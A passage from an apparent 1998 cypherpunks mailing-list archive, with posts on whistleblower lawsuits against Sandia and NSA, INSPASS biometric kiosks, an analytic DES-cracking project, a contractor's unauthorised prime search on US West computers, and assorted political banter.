In Morales' case Sandia submitted a deficient Brief of the Appellees
which was returned, missed the filing
date, and failed to serve Morales with its late brief.

Payne and Morales both won at the Tenth Circuit.  But judges awarded the
wins to Sandia.

All attempts by Morales and Payne to get copies of the docket for their
respective Tenth Circuit cases failed.

Therefore, Morales and Payne hatched a plan to get the dockets and
expose government misconduct.  

Payne previously made FOIA requests to NSA for  copies of messages and
translations given to 
Iraq during the Iraq/Iran war, copies of Libyan messages intercepted by
NSA, and NSA cryptographic
algorithms Payne thought contained deficiencies.

Morales and Payne sued NSA pro se for the documents. Lawsuit progress
was broadcast on Internet through e-mail and

     http://www.aci.net/kalliste/speccoll.htm
     http://jya.com/whpfiles.htm

And Payne wrote

 Black and White Test of Cryptographic Algorithms

criticizing the US government's crypto contest.  http://zolatimes.com.

Morales and Payne FINALLY got copies of dockets from their respective
cases from the Tenth
Circuit using Internet as a an innovative tool. 

9/15/98 10:39 AM
John Young
J Orlin Grabbe
Zola
and OTHERS

495 words counted by MS Word.

Please e-mail any editing improvements to John Young.  

I will meet Morales for lunch.  Then phone John Young.

Thanks in advance.

bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Sep 1998 11:00:54 +0800
To: cypherpunks@cyberpass.net
Subject: IP: INS Offers Biometric System for Frequent Flyers
Message-ID: <v04011717b22433e45715@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Tue, 15 Sep 1998 09:18:32 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: INS Offers Biometric System for Frequent Flyers
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Wired
http://www.wired.com/news/news/technology/story/15014.html

 US Takes Immigration in Hand
 by Theta Pavis

 4:00am15.Sep.98.PDT
 It's been 44 years since Ellis Island closed
 shop, but immigration can still be a long,
 tiresome process. In an effort to speed the
 process for international travelers, the US
 Immigration and Naturalization Service is offering
 a biometric system for willing frequent flyers.

 So far, 71,000 people in six airports have signed
 up for the system, called INSPASS. It employs
 a biometric kiosk to scan and match the
 geometric dimensions of travelers' hands, verify
 their identities, and perform standard
 background checks. The INS plans to expand
 the program to four additional airports by the end
 of the year.

 "It creates a fast lane for people," said James
 Wayman, head of the federally funded National
 Biometric Test Center at San Jose State
 University.

 The kiosks were integrated by EDS, which has
 had a US$300 million contract with the INS for
 automation support and software development
 since 1994. This summer, the INS awarded a
 new, five-year information-technology contract
 worth $750 million to EDS and four other
 companies.

 Ann Cohen, an EDS vice president in the
 government services group, said the fact that so
 many people have signed up for the INSPASS
 system shows that biometrics are becoming
 more popular and could be commonplace in the
 future.

 "Were getting over that 'Big Brother' hurdle,"
 Cohen said. As e-commerce develops and
 terrorism grows, biometrics increasingly are the
 "only sure way to get security."

 US and Canadian citizens flying overseas on
 business at least three times a year are eligible
 for the free INSPASS program. People from
 Bermuda and 26 other countries that have
 visa-waiver agreements with the United States
 are also eligible.

 The INSPASS kiosks, which look like ATM
 machines, were recently installed at the Los
 Angeles International Airport, where more than
 1,000 people have enrolled in the program. Rico
 Cabrera, a spokesman with the INS Los Angeles
 regional office, said travelers like the fact that
 INSPASS can check their identity in 16 to 60
 seconds, a process that can take up to three
 hours at some airports. The largest group of
 INSPASS users at LAX are US citizens,
 followed by Australians and New Zealanders.

 After filling out a one-page form and passing a
 background check, travelers can be issued a
 Port Pass card with their picture and a
 12-number ID on it.

 A traveler inserts the card in the kiosk, which
 reads the ID number and links to a centralized
 database run by US Customs. A geometric hand
 template is called up from the database and
 transferred to the kiosk. After a green light
 flashes, the right hand is placed on a reflective
 surface -- the ID-3D Handkey, made by
 Recognition Systems. The HandKey uses a
 video camera to take a geometric image of the
 traveler's hand and fingers, and the data is
 converted using compression algorithms. If it
 matches the template of the hand stored in the
 database, the traveler is in.

 INSPASS kiosks are also in use at airports in
 Newark, Miami, Kennedy (New York), Pearson
 (Toronto), and Vancouver, British Columbia. The
 INS eventually plans to install them at most
 busy international airports around the country,
 including Washington, San Francisco, Seattle,
 and Honolulu. The department has geared the
 program toward business travelers, diplomats,
 airline personnel, and other "low-risk" visitors.

 Some argue that the INS hasn't done enough to
 market the program. Jeffrey Betts, WorldWide
 Solution Manager for IBM -- which has developed
 FastGate, a kiosk similar to INSPASS -- said
 people aren't enrolling fast enough in the INS
 system.

 International arrivals at airports across the globe
 are growing every year by 7 to 10 percent, Betts
 said, but border control resources are flat or
 declining. In 1996, some 65,000 people were
 enrolled in the INSPASS program, but the
 program has added just 6,000 new users since
 then.

 IBM, which has been running a small pilot
 program of FastGate in Bermuda for the past
 year, is building a system where people can
 swipe a credit card through a kiosk at the airport
 and connect with a database where the
 biometrics are stored.

 "Governments will have to find ways to do more
 with less or force travelers to queue like cattle,"
 Betts said.

 While the government plans on marketing
 INSPASS more aggressively in the future,
 Schmidt said, INS is counting on word of mouth
 to get new people enrolled. "We don't really have
 the budget for a huge marketing campaign," she
 said.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Cypherpunk <carolann@censored.org>
Date: Tue, 15 Sep 1998 11:18:05 +0800
To: Tim May <cypherpunks@Algebra.COM
Subject: Re: Zipped Starr Report
In-Reply-To: <35FEA2F2.70758DE5@moraine.tec.wi.us>
Message-ID: <3.0.2.32.19980915111604.0071bd08@pop.primenet.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3996.1071713799.multipart/signed"

--Boundary..3996.1071713799.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

At 09:04 AM 9/15/98 -0700, Tim May wrote:
>
>At 10:25 AM -0700 9/15/98, Terry Leininger wrote:
>>>Is it possible to download the Starr report somewhere, zipped and
>>prepared for
>>>offline reading?
>>

Hey!  Wait'll I change out of my blue dress...till you unzipppp..

>Don't you mean _unzipped_?
>
>
>--Tim May
>
>(This space left blank pending determ. of acceptability to the gov't.)
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
>
>
>
>
Member Internet Society  - Certified Mining Co. Guide  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.165.50.96
My Homepage
The Cyberdoc
***********************************************************************
Will lobby Congress for Food & Expenses!!!

--Boundary..3996.1071713799.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IFBHUCBQZXJz
b25hbCBQcml2YWN5IDYuMApDb21tZW50OiBUb3RhbGx5IHVuY2Vuc29yZWQg
ZnJvbSBjZW5zb3JlZC5vcmcKCmlRQS9Bd1VCTmY2U3lEaU0yNjU2VlhBckVR
S1V5UUNmVUQ4eHE0V1A0d3c4RmZoTzdjMDY4YitzOXZzQW4zZ0wKMkIrY0Vq
ZVpyaHNaZ1BJTGIxdnF5T0JaCj16eHdoCi0tLS0tRU5EIFBHUCBNRVNTQUdF
LS0tLS0K
--Boundary..3996.1071713799.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Tue, 15 Sep 1998 05:47:08 +0800
To: cypherpunks@toad.com
Subject: Re: Joe Farah 9/14 (Pppbbbttt)
Message-ID: <80256680.003A249A.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>>Almost 60 percent of those polled said they thought Clinton was fit to be
>>president. By what standard? That's the trouble. Americans have no
>>standards -- no unchangeable yardsticks by which they measure right and
>>wrong, truth from fiction.

>By *their* standard, by their own personal judgement. There's no moral
>yardstick, and God help us if there is in the future. Who makes the
>yardstick? Who sits down and says, "This is the moral standard in this
>country, abide by it or suffer the consequences"?

Sorry but there are absolutes and there is a moral yardstick.  Whether this
 is accepted or not is beside the point.

There has to be absolutes otherwise any action can be excused (or damned).
  The real cry should be
"God help us to instigate Your yardstick".  God doesn't change and neither
does His measure.

1)Love the Lord, with all your heart, with all you soul with all your mind
and all your strength
2)Love you neibour as yourself.

Everything else hangs on these.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 15 Sep 1998 11:52:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The DES Analytic Crack Project
In-Reply-To: <199809151500.RAA31305@replay.com>
Message-ID: <199809151652.LAA13965@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous <nobody@replay.com>
 
>> The concerns are generally that we will experience an unexpected
>> "combinatoric explosion" in the higher round problems
 
> Unexpected by you, perhaps, but expected by everyone else.  The
> complexity of the expressions should increase exponentially with the
> number of rounds.  Extrapolating from two and four round results to
> eight and sixteen is the wrong model.  (You can artificially suppress
> this by introducing new variables for each round, but that doesn't
> change the underlying complexity of the problem.)
 
The size of the problem scales linearly with the number of rounds, and
of course additional variables are introduced to make sure that terms
in the CNF representation reference three or less variables.
 
The number of such terms is clearly bounded by the cube of the number
of variables, and practical experiments with a wide variety of
problems illustrate that memory usage is generally limited to a small
integer multiple of the original problem size.  Intractability
generally appears as a lack of locality, in that canonicalization of
the problem requires the use of algebraic identities involving large
numbers of terms, such identities becoming statistically more rare
with increasing N.  We anticipate that the set of such identities
required to converge a DES problem will have a small N, and we will
simply augment that set should the algorithm cease to make progress
prior to finding a solution.  We know there will be no memory
explosion, and CPU should remain small enough for us to achieve our
stated goal of less than a day on a $5k workstation.
 
> Can't you come up with a back-of-the-envelope estimate for the number
> of terms in your sixteen round expression?  Even without fully
> optimized S-box expressions this information would be useful.  If it
> is greater than the number of atoms on Earth then it would be a strong
> hint that this approach won't work.
 
Back when we were working on the original DES challenge, with naive
S-Box optimization, the size of the input data sets were as follows.
 
            vars   implications   3-CNF terms
            ----   ------------   -----------
 2-round    2015           4046          1959
 4-round    4588           9192          4596
 8-round    9852          19720          9860
16-round   20389          40794         20397
 
> If you really want to attract money you need some kind of numbers to
> show that the approach has a prayer of working.  Show the size of the
> problem you will get, estimate how much improvement you'll get with
> your improved S-box representations, compare it with the problems
> tackled by available combinatorial algorithms.  You should be able to
> do this with a few hours of work, at least to show that the basic
> concept is sound (or unsound).
 
Our original input sets were generated by a very indirect method,
involving an original implementation as switch networks, a conversion
to NANDs, and ultimately, 3-conjunctive normal form, with some simple
local optimization along the way.  We are a lot better at setting up
these problems now than we were the first time we tried, and
anticipate that we can knock down the variable count by at least a
factor of four by precomputing minimal S-Box representations.
 
This will result in a combinatorial problem in 4000 to 5000 variables
for full 16-round DES, and make this problem approximately equal in
size to where the 4-round problem is now.
 
We've run quite a few medium-sized problems through our combinatorial
algorithms, including reduced-round DES, factoring the 32 bit product
of two 16 bit primes written in terms of individual 2-intput logical
functions, and various problems involving minimizing representations
of boolean functions with respect to a specific cost criteria.
 
So far, no huge surprises.
 
Finding the global minimum cost representation of an S-Box in terms of
selected other functions is actually a good-sized combinatorial
problem in and of itself, and should serve to illustrate how our
algorithms work prior to embarking upon the higher round DES cracks.
 
We don't suggest that these algorithms magically solve every
conceivable problem, merely that they seem to do a satisfactory job on
a number of problems of practical interest.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 15 Sep 1998 14:11:21 +0800
To: tom@xgboy.com
Subject: CHRYSLER AWARD NOMINATION STATEMENT   9/15/98 12:30 PM
Message-ID: <35FEB8CA.78C4@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



Tuesday 9/15/98 12:39 PM 

e-mail

Ms Vikki Hardy
Chrysler Award for Innovative Design
c/o Bozell Advertising
1000 Town Center, 15th Floor
Southfield, MI 48075-1241
248 262 8643
vhardy@detroit.bozell.com

We are sending our submission by 

1	e-mail
2	hardcopy
3	diskette with .htm and .txt files

by priority certified mail.	             

Best
bill


	             CHRYSLER AWARD NOMINATION STATEMENT
			        9/15/98 12:30 PM
			
American forefathers drafted the Constitution and laws of our country
shortly after having suffered injustice.   Fresh in their minds were
strategies used by their oppressors.  Writers of the Constitution and
laws anticipated ways to subvert our system.  Therefore, our forefathers
designed safeguards into our legal system to prevent future injustice.

But these safeguards DON'T appear to be working today.

Morales and Payne designed a strategy using the National Security Agency
[NSA], Sandia National Laboratories, the US Federal Court System, and
publication on Internet to illustrate how the US government has
deteriorated.

Arthur Morales WAS a supervisor at Sandia Labs in 1991.  Morales and
Manuel Garcia organized a class action lawsuit on behalf of Hispanics
against Sandia.

Sandia settled Morales' and Garcia's lawsuit.  Department of Energy
acknowledged from Freedom of Information Act  [FOIA] requests that as
of  December 31, 1995 Morales cost Sandia $567,137 in legal fees.

Sandia retaliated against Morales.  Morales sued Sandia in New Mexico
District Court.  Morales lost.

William Payne wrote a technical report describing 'deficiencies'  NSA's
cryptographic algorithms http://jya.com/da/whpda.htm.  Sandia
transferred Payne to break electronics locks for the Federal Bureau of
Invesitgation [FBI].  Payne refused to do illegal work. 
http://www.jya.com/whp1.htm.

Payne sued Sandia in Federal Court.  Payne lost and court records were
sealed.

FBI agent Bernardo Perez  led a class action lawsuit against the FBI for
race discrimination against Hispanic FBI agents. 
http://www.usdoj.gov/osg/1995/w951482w.txt

Perez won.  Perez was assigned agent-in-charge of the FBI in Albuquerque
for settlement.  But Perez lost money.

Morales and Payne learned that the FBI extorted an inexpensive from
Perez by telling Perez that the FBI was GUARANTEED to win on appeal in
Federal Circuit.

With Perez' and others knowledge of circuit courts, Morales and Payne
appealed their respective cases pro se to the Tenth Circuit.  

In Payne's case Sandia failed to submit its Brief of the Appellees on
time. Then falsified its certificate of service when Payne filed to
remand.

In Morales' case Sandia submitted a deficient Brief of the Appellees
which was returned but failed to serve Morales with its brief.

Payne and Morales both won at the Tenth Circuit on technicalities.  But
judges awarded the wins to Sandia.

All attempts by Morales and Payne to get copies of the docket for their
respective Tenth Circuit cases failed.

Therefore, Morales and Payne hatched a plan to get the dockets and
expose government misconduct.  

Payne previously made FOIA requests to NSA for  copies of messages and
translations given to Iraq during the Iraq/Iran war, copies of Libyan
messages intercepted by NSA, and NSA cryptographic algorithms Payne
thought contained deficiencies.

Morales and Payne sued NSA pro se for the documents. Lawsuit progress
was broadcast on Internet through e-mail and

     http://www.aci.net/kalliste/speccoll.htm
     http://jya.com/whpfiles.htm

And Payne wrote

 Black and White Test of Cryptographic Algorithms

criticizing the US government's crypto contest.  http://zolatimes.com.

Morales and Payne FINALLY got copies of dockets from their respective
cases from the Tenth Circuit using Internet as an innovative tool.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Sep 1998 12:12:16 +0800
To: cypherpunks@cyberpass.net
Subject: Mersienne crack busted...
Message-ID: <v04011718b2244f17bc80@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Somebody evidently installed the Mersienne(sp?) prime search client on
2000+ AT&T machines.

The local talk station news has a report that they have just been
apprehended and will be prosecuted for it.

Interesting times, indeed...

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 15 Sep 1998 12:25:33 +0800
To: nnburk@cobain.HDC.NET
Subject: Re: Predictions: Crime and Criminal Justice in the 21st Century
In-Reply-To: <35FDD227.4C7D@yankton.com>
Message-ID: <35FEA26E.B168F6AA@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



nnburk wrote:
> 
> Predictions: Crime and Criminal Justice in the 21st Century
> 
> 1.      The United States will experience a significant economic
> recession/crisis very close to the turn of the Century.

I see this as well and agree with it.  The recent stock market rocking back and
forth is a sign that something sucks, and sucks badly.  Y2K will of course make
this into a bigger horror.
 
> 2.      As the large pool of young people born in the early 1990s
> become teenagers and young adults, there will be a dramatic
> increase in violent crime around the year 2005-2010.

I don't necessarily see this.  What do you base this on?  Outside of where I
live, there is an elementary school.  Young kids these days are made to wear
UNIFORMS and carry ID's and can only go to school with see through bags and
must pass through metal detectors and/or be frisked.

Further, one of the local newspapers (Times? Daily News? Post?) here in NYC had
some story about how the city school security will be taken over by the police
department, effectively turning schools into jails.  IMHO, this won't turn out
delinquents, this will turn out slaves who are used to being treated as slaves,
are used to having no freedoms and don't expect them; they'll live without
privacy and they'll like it.  Those are your kids America: sheep!

Mindless slaves rarely rebel; unless you take away their MTV and their Sony
Playstations I doubt this.
 
> 3.      America will experience sporadic civil disorders/riots in
> many of its urban areas during the next 10-15 years -- much of it
> related to racial/ethnic problems.

Doubt it.  Unless they can't get food or money, or IF there are massive
blackouts they will riot, but will do so to break into stores and loot.
(Speaking based on LA riots and riots here in NYC about a decade or two ago
when power failed.)
 
> 4.      Terrorist acts by "fringe"/special issue groups will
> increase at a significant rate -- becoming a major law enforcement
> and security problem.

Okay, this is likely.
 
> 5.      As faith in the criminal justice system declines, there
> will be a rise in vigilante-based incidents where citizens take
> the enforcement of crime problems into their own hands.

The rest of your prediction sounds like you've watched Robocop a few times too
many and actually BELIEVED it! :)  Care to back it up with reasons?
 
> 6.      Much of middle- and upper-class America will take a
> "retreatist" attitude and move into private high-security
> communities located in suburban or rural areas. Because of
> technological advances, many companies and corporations will also
> move out of the urban environments as well.
> 
> 7.      Due to many of the predictions listed above, much of law
> enforcement and security in the 21st Century will become
> privatized and contractual. Traditional law enforcement agencies
> will primarily serve urban and rural communities.
> 
> 8.      Law enforcement will evolve into two major and divergent
> roles: traditional law enforcement and a more specialized
> military tactical role to deal with the growing urban violance
> and terrorist incidents.
> 
> 9.      Significant violence and unrest will plague our nation's
> prisons. Major prison riots will become a regular occurrence.
> 
> 10.     With the decrease of the possibility of major global
> warfare, the United States military will take on an increased
> domestic "peace-keeping" role with America's law enforcement
> agencies.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 15 Sep 1998 12:41:03 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <199809150228.EAA19097@replay.com>
Message-ID: <35FEA45C.4B167064@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> I know of several people in addition to myself who have complained to
> Sixdegrees about this. I've personally given up sending complaints back to
> them, and I lost count at 5. Sixdegrees simply ignores them. I've sent
> them to their upstream sites, and they either ignore them or tell me that
> they've forwarded them to Sixdegrees. My complaints, at least, were very
> civil. One explained exactly what a mailing list was, for crying out loud.
> I can't speak for Hyper-real's (if he sent any) and the others. You may be
> able to use that defense if Sixdegrees didn't know, but they do.

Don't ignore the fact that 6degrees of spam, like most other organizations that
pose as a free service do so to make money from ads.  The more sheep view the
ads of their true clients, the more money they make.  They have no interest in
cutting down the supply of viewers.  If a mailing list gets spammed because of
an asshole, so much the better since many of that list might go and check out
the site, even if just to find contact info to complain to.


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 15 Sep 1998 13:42:29 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Mersienne crack busted...
In-Reply-To: <v04011718b2244f17bc80@[139.167.130.246]>
Message-ID: <199809151842.OAA01048@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v04011718b2244f17bc80@[139.167.130.246]>, on 09/15/98 
   at 01:11 PM, Robert Hettinga <rah@shipwright.com> said:

>Somebody evidently installed the Mersienne(sp?) prime search client on
>2000+ AT&T machines.

>The local talk station news has a report that they have just been
>apprehended and will be prosecuted for it.

>Interesting times, indeed...

It was US West's computers:

DENVER (AP) -- A 28-year-old computer expert is accused of hacking into
the U S West computer system and diverting more than 2,500 machines that
should have been helping answer phones to his effort to solve a
350-year-old math problem, according to documents filed in a federal
court.

Aaron Blosser also allegedly obtained the passwords to 15,000 U S West
workstations and sent much of the coded material he found in them onto the
Internet, according to an FBI search warrant served at his Lakewood,
Colo., home last Wednesday.

The warrant says Blosser, a contract computer consultant who worked for a
vendor that was hired by Denver-based U S West, is under investigation for
computer fraud.

In a telephone interview with The Denver Post, Blosser said he has not
been charged with any crime and said he made no money from his
unauthorized use of U S West computers. He also failed in his mathematical
quest: the search for a new prime number.

``I've worked on this (math) problem for a long time,'' said Blosser.
``When I started working at U S West, all that computational power was
just too tempting for me.''

Blosser enlisted 2,585 computers to work at various times during the day
and night and quickly ran up 10.63 years of computer processing time in
his search for a new prime number.

U S West spokesman David Beigie called the hacking ``unprecedented'' in
company history. ``It would be virtually impossible to do it from the
outside,'' he said.

Blosser's alleged hacking was discovered when computers at U S West's
facility in Phoenix, which normally respond in 3 to 5 seconds, took as
long as five minutes to retrieve telephone numbers.

The computers were so slow in mid-May that customer calls had to be
rerouted to other states, and at one point the delays threatened to close
down the Phoenix Service Delivery Center.

On May 27, U S West's Intrusion Response Team found a software program on
the system that ``captured U S West computers to work on a project
unrelated to U S West Services,'' according to the search warrant.

The anti-hacking team traced the software to a terminal at the company's
Littleton offices, where they found Blosser, a self-described ``math
geek.''

Blosser allegedly showed agents how he remotely installed software on
computers throughout the U S West system and reprogrammed them to search
for a new prime number.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Get OS/2 - the best Windows tip around!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNf63Bo9Co1n+aLhhAQEkswP+N+DQE6WhuZtk1pCjUfo08BvAd4W38Anl
nekwRyzeK2j3MsXx86UgN3/rj2O0BteRBGwV8PQlNududI7MNU2L/qtL+3ZBJKrI
yLBqk3wvYBTn/VzoS/83kge0nVIAx2YTJCt+NSzE5O29oEabIPmruxCZH2Mj14pb
eAOVYNJOPY4=
=Vv1U
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vivek Vaidya" <phirebearer@hotmail.com>
Date: Tue, 15 Sep 1998 16:22:24 +0800
To: cypherpunks@toad.com
Subject: Democracy...
Message-ID: <19980915210638.14549.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




>>>Almost 60 percent of those polled said they thought Clinton was fit 
to be
>>>president. By what standard? That's the trouble. Americans have no
>>>standards -- no unchangeable yardsticks by which they measure right 
and
>>>wrong, truth from fiction.
>
>>By *their* standard, by their own personal judgement. There's no moral
>>yardstick, and God help us if there is in the future. Who makes the
>>yardstick? Who sits down and says, "This is the moral standard in this
>>country, abide by it or suffer the consequences"?
>
>Sorry but there are absolutes and there is a moral yardstick.  Whether 
this
> is accepted or not is beside the point.
>
>There has to be absolutes otherwise any action can be excused (or 
damned).
>  The real cry should be
>"God help us to instigate Your yardstick".  God doesn't change and 
neither
>does His measure.
>
>1)Love the Lord, with all your heart, with all you soul with all your 
mind
>and all your strength
>2)Love you neibour as yourself.
>
>Everything else hangs on these.
>
Ever heard of seperation of church and state? Democracy? the rights of 
the individual?  While you certainly have the right to practice your 
religion in what ever manner you so choose demanding that everyone else 
does, or that the president of the us of ais subject to you PERSONAL 
faith decisions is outragous

Vivek Vaidya

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Sep 1998 13:50:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Anon traffic via SSZ
Message-ID: <199809151913.OAA32743@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 15 Sep 1998 19:07:24 +0200
> From: Anonymous <nobody@replay.com>
> 
> There seems to be a problem posting anonymous messages to cypherpunks@ssz.com. I have posted several messages over the past week and *none* of them have showed up.
> 
> I am posting this as a test message. I am sending it to the following addresses:
> 
> cypherpunks@toad.com
> cypherpunks@ssz.com
> cypherpunks@algebra.com
> cypherpunks@cyberpass.net
> 
> I will add the server name to the subject line for each post to test which messages are being delivered and which are not.
> 
> I AM TOTOCUS!!

Nothing on this end filters unless it comes from/to:

cypherpunks-unedited@toad.com
mosexpo.ru
fw9.telekom.edu
any.where.com

I filter these because the dumbshit's at mosexpo.ru keep sending messages
with munged headers that fill up postmaser's mailbox with delivery failure
messages. I got tired of using the 'd' key. But even in this case, I only
filter *after* I've forwarded the traffic to the other nodes.

The only other quirk I'm aware of regarding anon posts are ones without
subjects, in which case I get a notice that the Japanese node is dropping
it because it doesn't have headers. This should come as no surprise as I've
made mention several times on this issue.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Branch <Michael.Branch@Central.Sun.COM>
Date: Tue, 15 Sep 1998 16:22:14 +0800
To: AIMSX@aol.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <199809152110.PAA04927@breckenridge.Central.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



this news group is a lot like the Jerry Springer show. 

Mike

> From: AIMSX@aol.com
> Date: Tue, 15 Sep 1998 08:06:33 EDT
> To: nobody@replay.com, cypherpunks@toad.com
> Mime-Version: 1.0
> Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
> Content-transfer-encoding: 7bit
> 
> Obviously you have a very high opinion of yourself and a low opinion of people
> who use AOL.  Contrary to popular belief, there are a few intelligent people
> on AOL, but it looks as if you are too egotistical to realize that.
> 
> Have you ever thought to look at your own mistakes before you publicize
> everyone else's to the world?  Are you just suffering from some sort of
> dillusion of grandeur - thinking you are better than everyone else.  Things
> like this are what many wars were started over, I am so happy the internet
> (hopefully) won't start a war in the real world.
> 

#################################################################
#								#
# Michael Branch, UwD			Customer Support Engr.  #
# (303) 464-4637			(UNIX witch doctor)	#
# Michael.Branch@central.sun.com	Sun Microsystems, Inc.	#
#								#
# "I turn big problems into little problems."			#
#								#
################################################################# 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Sep 1998 15:20:33 +0800
To: cypherpunks@cyberpass.net
Subject: Crypto in a Cuban Crime...
In-Reply-To: <19980915182955.12551.qmail@listbox.com>
Message-ID: <v04011706b2246e37746e@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:18 PM -0400 on 9/15/98, Charles Smith of Win Schwartau's FUDFactory
wrote something mildly clueful:


> BUSTED CUBAN SPIES USE CRYPTO
> -----------------------------
> FBI officials are proud that they broke up a small ring of Cuban
> spies in Florida.  The Cuban espionage agents are accused of
> using encryption to encode messages and protect information.
> Expect Director Freeh to use this bust as one of a hand full
> historical examples of "crypto" crimes in his next Congressional
> testimony.  According to his last testimony in August 1998, only
